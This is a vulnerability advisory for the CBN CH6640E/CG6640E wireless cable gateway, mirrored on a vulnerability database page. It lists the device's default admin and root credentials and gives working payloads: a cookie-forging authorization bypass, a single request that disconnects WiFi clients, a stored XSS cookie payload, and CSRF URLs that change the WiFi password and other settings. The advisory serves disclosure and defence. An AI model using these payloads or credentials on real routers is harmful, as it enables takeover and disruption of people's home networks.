Lucene search
K

CBN CH6640E/CG6640E Wireless Gateway XSS / CSRF / DoS / Disclosure

🗓️ 28 Oct 2014 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 61 Views

CBN CH6640E/CG6640E Wireless Gateway Vulnerabilitie

Code
`  
CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities  
  
  
Vendor: Compal Broadband Networks (CBN), Inc.  
Product web page: http://www.icbn.com.tw  
Affected version: Model: CH6640 and CH6640E  
Hardware version: 1.0  
Firmware version: CH6640-3.5.11.7-NOSH  
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01  
DOCSIS mode: DOCSIS 3.0  
  
  
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,  
home office, or small business/enterprise. It can be used in households with  
one or more computers capable of wireless connectivity for remote access to  
the wireless gateway.  
  
Default credentials:  
  
admin/admin - Allow access gateway pages  
root/compalbn - Allow access gateway, provisioning pages and provide more  
configuration information.  
  
Desc: The CBN modem gateway suffers from multiple vulnerabilities including  
authorization bypass information disclosure, stored XSS, CSRF and denial of  
service.  
  
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2014-5203  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php  
  
  
04.10.2014  
  
---  
  
  
  
Authorization Bypass Information Disclosure Vulnerability  
#########################################################  
  
http://192.168.0.1/xml/CmgwWirelessSecurity.xml  
http://192.168.0.1/xml/DocsisConfigFile.xml  
http://192.168.0.1/xml/CmgwBasicSetup.xml  
http://192.168.0.1/basicDDNS.html  
http://192.168.0.1/basicLanUsers.html  
http://192.168.0.1:5000/rootDesc.xml  
  
Set cookie: userData to root or admin, reveals additional pages/info.  
  
--  
<html>  
<body>  
<script>  
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";  
</script>  
</body>  
</html>  
--  
  
  
Denial of Service (DoS) for all WiFi connected clients (disconnect)  
###################################################################  
  
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1  
  
  
Stored Cross-Site Scripting (XSS) Vulnerability  
###############################################  
  
Cookie: userData  
Value: hax0r"><script>alert(document.cookie);</script>  
  
--  
<html>  
<body>  
<script>  
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";  
</script>  
</body>  
</html>  
--  
  
  
Cross-Site Request Forgery (CSRF) Vulnerability  
###############################################  
  
DDNS config:  
------------  
  
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1  
  
  
Change wifi pass:  
-----------------  
  
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1  
  
  
Add static mac address (static assigned dhcp client):  
-----------------------------------------------------  
  
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1  
  
  
Enable/Disable UPnP:  
--------------------  
  
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)  
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Oct 2014 00:00Current
0.2Low risk
Vulners AI Score0.2
61